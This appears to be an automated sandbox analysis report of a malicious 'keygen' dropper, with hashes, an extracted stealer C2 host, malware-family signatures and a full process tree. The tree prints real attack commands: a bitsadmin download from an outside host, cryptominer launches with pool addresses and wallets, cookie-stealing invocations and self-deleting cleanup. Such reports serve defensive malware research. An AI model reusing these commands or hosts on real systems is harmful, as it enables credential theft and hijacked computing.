Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1800s
  • max time network
    1741s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    26-04-2021 05:25

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 52 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 10 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 38 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    1⤵
      PID:1188
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2684
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Browser
        1⤵
          PID:2892
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2676
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
            PID:2484
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
            1⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2460
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1912
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1408
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1244
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1056
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:912
                    • C:\Users\Admin\AppData\Roaming\whajibs
                      C:\Users\Admin\AppData\Roaming\whajibs
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4280
                      • C:\Users\Admin\AppData\Roaming\whajibs
                        C:\Users\Admin\AppData\Roaming\whajibs
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5292
                    • C:\Users\Admin\AppData\Roaming\ugajibs
                      C:\Users\Admin\AppData\Roaming\ugajibs
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:5420
                    • C:\Users\Admin\AppData\Roaming\whajibs
                      C:\Users\Admin\AppData\Roaming\whajibs
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:3864
                      • C:\Users\Admin\AppData\Roaming\whajibs
                        C:\Users\Admin\AppData\Roaming\whajibs
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:4792
                    • C:\Users\Admin\AppData\Roaming\ugajibs
                      C:\Users\Admin\AppData\Roaming\ugajibs
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:6136
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:340
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:472
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:2884
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4056
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2092
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:2724
                        • C:\Users\Admin\AppData\Local\Temp\is-CKL6M.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-CKL6M.tmp\Install.tmp" /SL5="$501CC,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:2916
                          • C:\Users\Admin\AppData\Local\Temp\is-7LTLG.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-7LTLG.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Drops file in Program Files directory
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:2728
                            • C:\Users\Admin\AppData\Local\Temp\JNSLEPQZHL\ultramediaburner.exe
                              "C:\Users\Admin\AppData\Local\Temp\JNSLEPQZHL\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:2324
                              • C:\Users\Admin\AppData\Local\Temp\is-S9FRK.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-S9FRK.tmp\ultramediaburner.tmp" /SL5="$80030,281924,62464,C:\Users\Admin\AppData\Local\Temp\JNSLEPQZHL\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:2012
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3540
                            • C:\Users\Admin\AppData\Local\Temp\7c-2bedb-890-134bd-61e34acd61714\Gutitaejyjo.exe
                              "C:\Users\Admin\AppData\Local\Temp\7c-2bedb-890-134bd-61e34acd61714\Gutitaejyjo.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2060
                            • C:\Users\Admin\AppData\Local\Temp\c3-657de-8b0-96ebd-7fe84a5bf467f\Lykonyjury.exe
                              "C:\Users\Admin\AppData\Local\Temp\c3-657de-8b0-96ebd-7fe84a5bf467f\Lykonyjury.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of WriteProcessMemory
                              PID:4112
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5cqkt0us.b5w\instEU.exe & exit
                                6⤵
                                  PID:4924
                                  • C:\Users\Admin\AppData\Local\Temp\5cqkt0us.b5w\instEU.exe
                                    C:\Users\Admin\AppData\Local\Temp\5cqkt0us.b5w\instEU.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5112
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g1s5xouq.hu2\google-game.exe & exit
                                  6⤵
                                    PID:5104
                                    • C:\Users\Admin\AppData\Local\Temp\g1s5xouq.hu2\google-game.exe
                                      C:\Users\Admin\AppData\Local\Temp\g1s5xouq.hu2\google-game.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Drops file in Program Files directory
                                      • Suspicious use of SetWindowsHookEx
                                      • Suspicious use of WriteProcessMemory
                                      PID:4380
                                      • C:\Windows\SysWOW64\rundll32.exe
                                        "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                        8⤵
                                        • Loads dropped DLL
                                        • Modifies registry class
                                        PID:496
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ph1dhw4a.jav\md1_1eaf.exe & exit
                                    6⤵
                                      PID:4848
                                      • C:\Users\Admin\AppData\Local\Temp\ph1dhw4a.jav\md1_1eaf.exe
                                        C:\Users\Admin\AppData\Local\Temp\ph1dhw4a.jav\md1_1eaf.exe
                                        7⤵
                                        • Executes dropped EXE
                                        PID:1008
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3mndjjmg.zxd\y1.exe & exit
                                      6⤵
                                        PID:1228
                                        • C:\Users\Admin\AppData\Local\Temp\3mndjjmg.zxd\y1.exe
                                          C:\Users\Admin\AppData\Local\Temp\3mndjjmg.zxd\y1.exe
                                          7⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1232
                                          • C:\Users\Admin\AppData\Local\Temp\MWzSUNN91A.exe
                                            "C:\Users\Admin\AppData\Local\Temp\MWzSUNN91A.exe"
                                            8⤵
                                            • Executes dropped EXE
                                            • Modifies system certificate store
                                            PID:5928
                                            • C:\Users\Admin\AppData\Roaming\1619422224355.exe
                                              "C:\Users\Admin\AppData\Roaming\1619422224355.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619422224355.txt"
                                              9⤵
                                              • Executes dropped EXE
                                              PID:4472
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\MWzSUNN91A.exe"
                                              9⤵
                                                PID:5352
                                                • C:\Windows\SysWOW64\PING.EXE
                                                  ping 127.0.0.1 -n 3
                                                  10⤵
                                                  • Runs ping.exe
                                                  PID:204
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\3mndjjmg.zxd\y1.exe"
                                              8⤵
                                                PID:5508
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /T 10 /NOBREAK
                                                  9⤵
                                                  • Executes dropped EXE
                                                  • Delays execution with timeout.exe
                                                  PID:5140
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\edjkkbjc.zv3\askinstall39.exe & exit
                                            6⤵
                                              PID:3244
                                              • C:\Users\Admin\AppData\Local\Temp\edjkkbjc.zv3\askinstall39.exe
                                                C:\Users\Admin\AppData\Local\Temp\edjkkbjc.zv3\askinstall39.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4200
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                  8⤵
                                                    PID:5644
                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                      taskkill /f /im chrome.exe
                                                      9⤵
                                                      • Kills process with taskkill
                                                      PID:5860
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cspegsff.nmv\inst.exe & exit
                                                6⤵
                                                  PID:4276
                                                  • C:\Users\Admin\AppData\Local\Temp\cspegsff.nmv\inst.exe
                                                    C:\Users\Admin\AppData\Local\Temp\cspegsff.nmv\inst.exe
                                                    7⤵
                                                      PID:5140
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aryafzlz.2x0\SunLabsPlayer.exe /S & exit
                                                    6⤵
                                                      PID:4956
                                                      • C:\Users\Admin\AppData\Local\Temp\aryafzlz.2x0\SunLabsPlayer.exe
                                                        C:\Users\Admin\AppData\Local\Temp\aryafzlz.2x0\SunLabsPlayer.exe /S
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Drops file in Program Files directory
                                                        PID:5456
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:6136
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:1536
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:492
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:2612
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:5176
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:5996
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                      8⤵
                                                                      • Checks for any installed AV software in registry
                                                                      PID:4968
                                                                    • C:\Windows\SysWOW64\bitsadmin.exe
                                                                      "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                      8⤵
                                                                      • Download via BitsAdmin
                                                                      PID:5892
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pkMJyZMVh3DzPhiu -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      • Drops file in Program Files directory
                                                                      PID:4504
                                                                    • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                      "C:\Program Files (x86)\lighteningplayer\data_load.exe" -puf2MfOCmKMwnJRv -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                      8⤵
                                                                      • Executes dropped EXE
                                                                      PID:5400
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:6080
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:2520
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:3812
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:4128
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5536
                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HqzugnfW\HqzugnfW.dll" HqzugnfW
                                                                                8⤵
                                                                                • Loads dropped DLL
                                                                                PID:3856
                                                                                • C:\Windows\system32\rundll32.exe
                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\HqzugnfW\HqzugnfW.dll" HqzugnfW
                                                                                  9⤵
                                                                                  • Loads dropped DLL
                                                                                  • Drops file in System32 directory
                                                                                  PID:2128
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:3304
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                  • Drops file in Program Files directory
                                                                                  PID:732
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:2920
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:5296
                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsv6C9.tmp\tempfile.ps1"
                                                                                      8⤵
                                                                                        PID:5900
                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                        8⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        PID:1196
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rqqdionh.yz3\GcleanerWW.exe /mixone & exit
                                                                                    6⤵
                                                                                      PID:5284
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u3vc5rvv.fjx\toolspab1.exe & exit
                                                                                      6⤵
                                                                                        PID:5656
                                                                                        • C:\Users\Admin\AppData\Local\Temp\u3vc5rvv.fjx\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\u3vc5rvv.fjx\toolspab1.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:5948
                                                                                          • C:\Users\Admin\AppData\Local\Temp\u3vc5rvv.fjx\toolspab1.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\u3vc5rvv.fjx\toolspab1.exe
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:5464
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2asmxt2q.uwi\c7ae36fa.exe & exit
                                                                                        6⤵
                                                                                          PID:5884
                                                                                          • C:\Users\Admin\AppData\Local\Temp\2asmxt2q.uwi\c7ae36fa.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\2asmxt2q.uwi\c7ae36fa.exe
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Checks SCSI registry key(s)
                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                            PID:5188
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0gjnaweo.ctt\app.exe /8-2222 & exit
                                                                                          6⤵
                                                                                            PID:6068
                                                                                            • C:\Users\Admin\AppData\Local\Temp\0gjnaweo.ctt\app.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\0gjnaweo.ctt\app.exe /8-2222
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4244
                                                                                              • C:\Users\Admin\AppData\Local\Temp\0gjnaweo.ctt\app.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\0gjnaweo.ctt\app.exe" /8-2222
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Modifies data under HKEY_USERS
                                                                                                PID:4792
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4232
                                                                                    • C:\Users\Admin\AppData\Roaming\C039.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\C039.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4780
                                                                                      • C:\Users\Admin\AppData\Roaming\C039.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\C039.tmp.exe"
                                                                                        4⤵
                                                                                          PID:4908
                                                                                      • C:\Users\Admin\AppData\Roaming\C4AE.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\C4AE.tmp.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5088
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w22208@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                          4⤵
                                                                                            PID:4744
                                                                                          • C:\Windows\system32\msiexec.exe
                                                                                            -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w24401 --cpu-max-threads-hint 50 -r 9999
                                                                                            4⤵
                                                                                            • Blocklisted process makes network request
                                                                                            PID:4064
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                          3⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:5104
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping 127.0.0.1
                                                                                            4⤵
                                                                                            • Runs ping.exe
                                                                                            PID:4400
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks whether UAC is enabled
                                                                                        PID:5272
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        PID:5756
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1900
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5232
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5308
                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4940
                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                      1⤵
                                                                                      • Suspicious use of SetThreadContext
